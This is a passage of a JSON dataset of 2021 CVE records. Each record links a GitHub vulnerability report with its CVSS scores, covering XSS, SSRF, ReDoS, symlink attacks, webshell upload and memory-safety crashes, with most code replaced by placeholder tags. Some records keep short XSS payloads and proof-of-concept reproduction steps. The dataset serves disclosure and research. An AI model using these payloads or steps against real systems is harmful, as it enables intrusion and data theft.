        "description": "The /proc interface parameter of the admin service is get cpuprof and get memprof commands, which have a symlink attacks vulnerability.. Dear beego Team, I would like to report a security vulnerability in Beego's admin module. The vulnerability code is in the profile.go APITAG and APITAG function does not correctly check whether the created file exists. As a result, Attackers can launch attacks symlink attacks locally. poc code\uff1a URLTAG func APITAG { file, err := APITAG APITAG if err != nil { ERRORTAG creating file: %s\", err) } _, err = APITAG logs for this process\")) if err != nil { APITAG } } $ ln s other/logs cpu APITAG $ go build symlink_attack.go $ ./symlink_attack $ cat other/logs My logs for this process $",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-27186",
        "Issue_Url_old": "https://github.com/fluent/fluent-bit/issues/3044",
        "Issue_Url_new": "https://github.com/fluent/fluent-bit/issues/3044",
        "Repo_new": "fluent/fluent-bit",
        "Issue_Created_At": "2021-02-09T06:49:52Z",
        "description": "NULL dereference on memory allocation error (src/ flb_avro). Bug Report Describe the bug NULL dereference (value returned by flb_malloc is not checked) after memory allocation error (flb_malloc is wrapper on malloc returning NULL on unsuccessful allocation). In most cases this issue will lead to crash via segmentation fault. Vulnerable Code ERRORTAG To Reproduce Problem was identified by source code review. Expected behavior Memory allocation errors should be handled by checking value returned by APITAG Your Environment Version used: Current \"master\" branch Additional context See following recommendations for details: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27231",
        "Issue_Url_old": "https://github.com/hestiacp/hestiacp/issues/1622",
        "Issue_Url_new": "https://github.com/hestiacp/hestiacp/issues/1622",
        "Repo_new": "hestiacp/hestiacp",
        "Issue_Created_At": "2021-02-15T01:40:20Z",
        "description": "FILETAG APITAG to DA feature request for further info: URLTAG For additional reference, here's an old thread from APITAG with NUMBERTAG possible solutions (mine being the worst of the NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.5,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-27293",
        "Issue_Url_old": "https://github.com/restsharp/RestSharp/issues/1556",
        "Issue_Url_new": "https://github.com/restsharp/restsharp/issues/1556",
        "Repo_new": "restsharp/restsharp",
        "Issue_Created_At": "2021-02-16T20:01:32Z",
        "description": "Fix APITAG This advisory was emailed to the maintainer. Posting here as an issue as requested. Doyensec Vulnerability Advisory Regular Expression Denial of Service APITAG in APITAG Affected Product: APITAG APITAG released versions) Vendor: FILETAG Severity: Medium Vulnerability Class: Denial of Service Status: Open Author: Ben Caller ( FILETAG SUMMARY The .NET library APITAG uses a regular expression which is vulnerable to Regular Expression Denial of Service APITAG when converting strings into APITAG If a server responds with a malicious string, the client using APITAG will be stuck processing it for an exceedingly long time. This allows the remote server to trigger a Denial of Service. TECHNICAL DESCRIPTION The vulnerable regular expression is APITAG in APITAG : URLTAG It is used by the APITAG function when deserializing JSON responses into classes with APITAG properties. Due to the APITAG part containing nested repeats, this regular expression has catastrophic backtracking when processing a long string of digits. The behaviour occurs as long as the digits are not followed immediately by a closing parenthesis ')'. An example of a APITAG payload is APITAG . The space between 'new' and APITAG is required due to pre processing in APITAG : URLTAG The complexity is exponential: increasing the length of the malicious string of digits by one makes processing take about twice as long. On my laptop NUMBERTAG digits takes about NUMBERTAG seconds to process and NUMBERTAG digits takes about NUMBERTAG seconds, so a string with NUMBERTAG digits should take approximately NUMBERTAG years to process. The vulnerable regular expression was first introduced in commit URLTAG REPRODUCTION STEPS The APITAG can be triggered by calling APITAG directly, or by deserializing JSON responses into a class with a property of type APITAG . Example C code to see the effect of the APITAG is attached below. Changing the length of the string of zeroes will change the processing time. CODETAG REMEDIATION Fix APITAG . We propose simply removing the asterisk: APITAG . Doyensec APITAG is an independent security research and development company focused on vulnerability discovery and remediation. We work at the intersection of software development and offensive engineering to help companies craft secure code. Copyright NUMBERTAG by Doyensec LLC. All rights reserved. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given. The information in the advisory is believed to be accurate at the time of publishing based on currently available information, and it is provided as is, as a free service to the community by Doyensec LLC. There are no warranties with regard to this information, and Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27308",
        "Issue_Url_old": "https://github.com/4images/4images/issues/3",
        "Issue_Url_new": "https://github.com/4images/4images/issues/3",
        "Repo_new": "4images/4images",
        "Issue_Created_At": "2021-02-13T12:30:30Z",
        "description": "4images NUMBERTAG APITAG panel login' Cross Site Scripting. Vulnerable parameter : redirect XSS sample Payload : APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability(POC NUMBERTAG Goto NUMBERTAG images admin panel page (demo APITAG URLTAG NUMBERTAG Enter the APITAG password=opensourcecms) , Turn on the intercept and click on APITAG NUMBERTAG copy paste the XSS payload after PATHTAG NUMBERTAG Forward the request and you can see XSS is triggered. Video POC : URLTAG Impact : With the help of xss attacker can perform social engineering on users by redirecting them from a real website to a fake ones. Attacker can steal their cookies leading to account takeover and download malware on their system, and there are many more attacking scenarios a skilled attacker can perform with XSS.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-27329",
        "Issue_Url_old": "https://github.com/friendica/friendica/issues/9929",
        "Issue_Url_new": "https://github.com/friendica/friendica/issues/9929",
        "Repo_new": "friendica/friendica",
        "Issue_Created_At": "2021-02-14T03:31:00Z",
        "description": "External service interaction (HTTP & DNS). Hello Friendica Team. Issue detail I found a vulnerability issue while testing frendica locally. It is possible to induce the application to perform server side DNS lookups of arbitrary domain names and HTTP request. Bug Description The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers. Steps to Reproduce The request: CODETAG The response: CODETAG The DNS and HTTP request received: APITAG More details To make this request doesn't need to be authenticated, the friendica application accepts any request as an attachment and next do the DNS lookup and the HTTP request. Issue remediation You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist. References External service interaction (DNS) URLTAG FILETAG FILETAG Platform Info This is Friendica, version NUMBERTAG that is running at the web location localhost The database version is NUMBERTAG the post update version is NUMBERTAG APITAG APITAG APITAG mysql Ver NUMBERTAG Distrib NUMBERTAG APITAG for debian linux gnu NUMBERTAG using readline NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27343",
        "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5317",
        "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5317",
        "Repo_new": "serenityos/serenity",
        "Issue_Created_At": "2021-02-13T05:10:17Z",
        "description": "APITAG Read buffer overflow in Crypto::der_decode_sequence. Found with APITAG File: FILETAG (with txt extension to allow uploading to GH) Trace: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27345",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/164",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/164",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2020-09-02T08:51:40Z",
        "description": "Segmentation fault caused by null pointer deference during multithread processing in ucompthread, stream.c NUMBERTAG Hi, there. There is a segmentation caused by null pointer deference that caused a fatal error during the execution. Here is a brief explanation: APITAG This is the output during execution: ~~~~ Decompressing... Bad checksum NUMBERTAG b NUMBERTAG f NUMBERTAG expected NUMBERTAG c Fatal error exiting Segmentation fault ~~~~ To reproduce, run: ~~~~ lrzip t seg stream NUMBERTAG POC (unzip first): FILETAG Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f8d8 bp NUMBERTAG cd NUMBERTAG sp NUMBERTAG f NUMBERTAG dafdd NUMBERTAG T NUMBERTAG f8d7 in ucompthread .. APITAG NUMBERTAG f NUMBERTAG fc6b9 in start_thread ( PATHTAG NUMBERTAG f NUMBERTAG d2e NUMBERTAG c in clone ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV .. APITAG ucompthread Thread T3 created by T0 here NUMBERTAG f NUMBERTAG e3 in pthread_create ( PATHTAG NUMBERTAG f3 in create_pthread .. APITAG NUMBERTAG f3 in fill_buffer .. APITAG NUMBERTAG f3 in read_stream .. APITAG NUMBERTAG ABORTING ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-27347",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/165",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/165",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2020-09-04T05:44:38Z",
        "description": "Segmentation fault casued by use after free in multithread process from close_stream_in, stream NUMBERTAG to lzma_decompress_buf, stream NUMBERTAG Hi, there. I find there is use after free issue in multithread processing in stream.c. The reason is that the buffer is unchecked during a multithread stream read. APITAG APITAG APITAG APITAG The high level reason might similar with issue NUMBERTAG but the program behavior/path is different. To reproduce, run ~~~~ lrzip t uaf stream NUMBERTAG lrz ~~~~ Since it is a problem in the multithread program, you might need to run this command multiple times to trigger. POC (unzip first): FILETAG Here is the output from the terminal: ~~~~ Decompressing... Bad checksum NUMBERTAG b NUMBERTAG f NUMBERTAG expected NUMBERTAG c Segmentation fault ~~~~ This is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG f0e0 at pc NUMBERTAG f8c bp NUMBERTAG ff7bdffdd NUMBERTAG sp NUMBERTAG ff7bdffdd NUMBERTAG Fatal error exiting WRITE of size NUMBERTAG at NUMBERTAG f0e0 thread T NUMBERTAG f8b in lzma_decompress_buf .. APITAG NUMBERTAG f8b in ucompthread .. APITAG NUMBERTAG ff7c1d NUMBERTAG b9 in start_thread ( PATHTAG NUMBERTAG ff7c NUMBERTAG c in clone ( PATHTAG NUMBERTAG f0e0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ff7c NUMBERTAG a in __interceptor_free ( PATHTAG NUMBERTAG a NUMBERTAG in close_stream_in .. APITAG previously allocated by thread T0 here NUMBERTAG ff7c NUMBERTAG fa in __interceptor_calloc ( PATHTAG NUMBERTAG c8f0 in open_stream_in .. APITAG Thread T3 created by T0 here NUMBERTAG ff7c NUMBERTAG ce1e3 in pthread_create ( PATHTAG NUMBERTAG f3 in create_pthread .. APITAG NUMBERTAG f3 in fill_buffer .. APITAG NUMBERTAG f3 in read_stream .. APITAG SUMMARY: APITAG heap use after free .. APITAG lzma_decompress_buf Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-27357",
        "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16018",
        "Issue_Url_new": "https://github.com/riot-os/riot/issues/16018",
        "Repo_new": "riot-os/riot",
        "Issue_Created_At": "2021-02-16T09:16:42Z",
        "description": "gnrc_rpl: Lack of bounds check for packed structs. Description RIOT's RPL implementation as provided by the APITAG module lacks proper bounds checks. RPL messages are encapsulated in ICMP NUMBERTAG datagrams. The message body of the ICMP NUMBERTAG datagram is extracted as follows: URLTAG The code above casts APITAG (i.e. the ICMP NUMBERTAG message body) to the appropriate RPL packed struct (e.g. APITAG ). However, it does not check whether the message is large enough to even contain a APITAG (or any other packed RPL struct). As such, the handlers in APITAG for specific RPL messages must check the len parameter before accessing any fields of these structs. The handler for APITAG messages, for example, directly pass the required information to the APITAG function, however, this function itself access fields of the struct before performing a length check to ensure that these fields are actually present. For example: URLTAG If the ICMP packet is too short this will result in an out of bounds read. Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG Compile and run the application using: APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27368",
        "Issue_Url_old": "https://github.com/monicahq/monica/issues/4888",
        "Issue_Url_new": "https://github.com/monicahq/monica/issues/4888",
        "Repo_new": "monicahq/monica",
        "Issue_Created_At": "2021-02-18T10:29:23Z",
        "description": "Security Issue XSS. Hi there, I'm using the latest version of Monica PRM web application NUMBERTAG deployed on my local Ubuntu machine. I would like to report to you the existing of Cross Site Scripting Vulnerability in the Contact Page. The following fields of the Contact object can be used to host a stored XSS ( First name, Middle name, Last name, Nickname & Description ) and will be triggered each time you browse the contact webpage or trying to edit the details. This happen because of the way that FILETAG do render the webpage and executing the XSS payload in the vulnerable fields. the payload used in the POC: APITAG FILETAG To mitigate this issue different safeguards can be implemented, please refer to this website for more details: URLTAG Regards,",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-27513",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/87",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/87",
        "Repo_new": "eyesofnetworkcommunity/eonweb",
        "Issue_Created_At": "2021-02-21T07:41:32Z",
        "description": "Arbitrary file upload & RCE. Bonjour, En testant la version NUMBERTAG je me suis rendu compte qu'il \u00e9tait possible d'uploader n'importe quel type de file en bypassant le filtre userside dans le module admin_ITSM, j'ai pu ainsi uploader un shell PHP en le nomant FILETAG via interception et modification de la requ\u00eate. Une demande d'enregistrement MITRE a \u00e9t\u00e9 faite incluant le brut force de session_ID, ce qui donne un RCE non authentifi\u00e9 sur la version NUMBERTAG je sais que vous avez chiffr\u00e9 les sessions_ID en MD5 dans un commit pour la futur version, j'ai bien peur que cela ne serve pas a grand chose, il suffit de chiffrer les sessions_ID \u00e9galement dans le brut force :( ). Je vous encourage \u00e0 inclure des modalit\u00e9s de s\u00e9curit\u00e9s dans le projet github ou une addresse de contact sur le site, parce que devoir mettre ca ici c'est un poil risky mais il n'y a pas vraiment le choix.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-27519",
        "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/2",
        "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/2",
        "Repo_new": "fudforum/fudforum",
        "Issue_Created_At": "2021-02-17T07:30:23Z",
        "description": "Cross Site Scripting. What is XSS Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Affected Version NUMBERTAG Demo installation: URLTAG > XSS NUMBERTAG ulnerable parameter srch Vulnerable UR L URLTAG PAYLOAD>&t=search Steps to reproduce the bug NUMBERTAG goto URLTAG NUMBERTAG In \"forum search\" option, paste XSS payload XSS payload: x\" onmouseover=alert NUMBERTAG Hover your mouse to \"x\" and XSS will get triggered Video POC : URLTAG > XSS NUMBERTAG ulnerable parameter author Vulnerable URL URLTAG PAYLOAD> Steps to reproduce the bug NUMBERTAG goto URLTAG NUMBERTAG In the APITAG by User\" search option, paste XSS payload XSS payload: y\" onmouseover=alert NUMBERTAG y NUMBERTAG Hover your mouse to \"y\" and XSS will get triggered Video POC : URLTAG Impact of XSS : If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user. With the help of XSS a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-27522",
        "Issue_Url_old": "https://github.com/WaterCountry/Learnsite/issues/1",
        "Issue_Url_new": "https://github.com/watercountry/learnsite/issues/1",
        "Repo_new": "watercountry/learnsite",
        "Issue_Created_At": "2021-02-17T14:26:22Z",
        "description": "there is.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-27568",
        "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/60",
        "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/60",
        "Repo_new": "netplex/json-smart-v2",
        "Issue_Created_At": "2021-02-22T21:44:52Z",
        "description": "Uncaught Exception in Parser. The parser fails to throw the ERRORTAG when the parser expects the input to be of the float number type AND the input not being a valid number. This can lead to uncaught exceptions by unexpected input, which may lead to Denial of Service APITAG URLTAG Parser Input of \" .\" or NUMBERTAG e+\" or NUMBERTAG e \" will crash with a ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-27568",
        "Issue_Url_old": "https://github.com/netplex/json-smart-v1/issues/7",
        "Issue_Url_new": "https://github.com/netplex/json-smart-v1/issues/7",
        "Repo_new": "netplex/json-smart-v1",
        "Issue_Created_At": "2021-02-22T21:10:21Z",
        "description": "Uncaught Exception in Parser. The parser fails to throw the ERRORTAG when the parser expects the input to be of the float number type AND the input not being a valid number. This can lead to uncaught exceptions by unexpected input, which may lead to Denial of Service APITAG URLTAG Parser Input of \" .\" or NUMBERTAG e+\" or NUMBERTAG e \" will crash with a ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-27568",
        "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/62",
        "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/62",
        "Repo_new": "netplex/json-smart-v2",
        "Issue_Created_At": "2021-03-05T03:16:52Z",
        "description": "when we release new version to fix CVETAG . hi, when we release new version to fix CVETAG . Now, the latest version is NUMBERTAG in maven repository. About CVETAG :An issue was discovered in netplex json smart NUMBERTAG through NUMBERTAG and json smart NUMBERTAG through NUMBERTAG An exception is thrown from a function, but it is not caught, as demonstrated by ERRORTAG When it is not caught, it may cause programs using the library to crash or expose sensitive information.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-27677",
        "Issue_Url_old": "https://github.com/sruupl/batflat/issues/105",
        "Issue_Url_new": "https://github.com/sruupl/batflat/issues/105",
        "Repo_new": "sruupl/batflat",
        "Issue_Created_At": "2021-02-22T11:07:28Z",
        "description": "Multiple Stored XSS Cross Site Scripting on Batflat CMS NUMBERTAG Multiple Stored XSS Cross Site Scripting on Batflat CMS NUMBERTAG Login with editor account with rights to Navigation, Galleries, Snippets APITAG APITAG ERRORTAG FILETAG Code being executed: FILETAG APITAG APITAG APITAG FILETAG Code being executed: FILETAG APITAG APITAG APITAG FILETAG Code being executed: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-27697",
        "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16062",
        "Issue_Url_new": "https://github.com/riot-os/riot/issues/16062",
        "Repo_new": "riot-os/riot",
        "Issue_Created_At": "2021-02-22T13:54:17Z",
        "description": "gnrc_rpl: missing bounds checks in gnrc_rpl_validation_options. Description The APITAG function has a problem very similar to the one described in NUMBERTAG It casts packed structs without performing a prior bounds check. For example, consider the handler for APITAG : URLTAG This is missing a check ala.: APITAG Otherwise, reading APITAG (or APITAG on the next iteration) may result in an out of bounds read: URLTAG Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG Compile and run the application using: APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG CC: MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27698",
        "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16085",
        "Issue_Url_new": "https://github.com/riot-os/riot/issues/16085",
        "Repo_new": "riot-os/riot",
        "Issue_Created_At": "2021-02-24T12:39:46Z",
        "description": "gnrc_rpl: missing bounds checks in _parse_options. Description The implementation of APITAG in APITAG has a problem very similar to the one described in NUMBERTAG for APITAG : It casts packed structs without performing prior boundary checks. I think the loop code is in fact more or less a copy of the one in APITAG , thus a fix very similar to NUMBERTAG will be needed for it too. Consider for example the following code: URLTAG In this case it might be the case that APITAG , however this case is not covered by the implementation currently. There are also other casts to packed structs in this function which have the same issue. Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG I was also a bit too lazy to figure out how I can add an ULA to a APITAG network interface, to work around that just make sure APITAG uses the first interface for DODAGs with the following patch (if you know how please let me know): CODETAG Note: If you don't want to apply this patch, it should also be possible to reproduce this issue by adding a non local IP NUMBERTAG address to your network interface and passing that address to the rpl root command below. Compile and run the application using: APITAG In the RIOT term initialize the RPL root instance with (the address passed to rpl root doesn't matter due to the patch from above): APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG CC: MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27811",
        "Issue_Url_old": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/2",
        "Issue_Url_new": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/2",
        "Repo_new": "whiskey-jj/w2s2x2222.github.io",
        "Issue_Created_At": "2021-02-25T04:15:57Z",
        "description": "A Code Injection vulnerability has been found in Qibosoft NUMBERTAG Last year, I found a Code Injection vulnerability in Qibosoft NUMBERTAG submitted China's cnvd, and obtained the CNVD number( CNVD NUMBERTAG URLTAG . Vulnerability demonstration I used the latest version of software in the test, and deployed the Apache server. The PHP version is NUMBERTAG and APITAG version is NUMBERTAG image NUMBERTAG URLTAG \u200b Log in to the administration page and visit the following URL. APITAG \u200b You can see that a webshell has been written to a PHP APITAG can find it in ERRORTAG image NUMBERTAG URLTAG Code audit APITAG \u200b In this function, the writelog function is called to write the APITAG to the file. image NUMBERTAG URLTAG \u200b In the writelog function, you can see that he finally writes the data to ERRORTAG image NUMBERTAG URLTAG \u200b In order to expand the vulnerability,we can use low privilege users to use XSS or CSRF attacks to make the administrator access the vulnerability APITAG vulnerabilities I have submitted in CNVD NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-27815",
        "Issue_Url_old": "https://github.com/libexif/exif/issues/4",
        "Issue_Url_new": "https://github.com/libexif/exif/issues/4",
        "Repo_new": "libexif/exif",
        "Issue_Created_At": "2021-02-25T07:19:10Z",
        "description": "APITAG in APITAG Project: exif system: ubuntu NUMBERTAG Fuzzer: afl_exif_out_xml FILETAG Command: APITAG asan ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-27836",
        "Issue_Url_old": "https://github.com/libxls/libxls/issues/94",
        "Issue_Url_new": "https://github.com/libxls/libxls/issues/94",
        "Repo_new": "libxls/libxls",
        "Issue_Created_At": "2021-02-26T19:58:44Z",
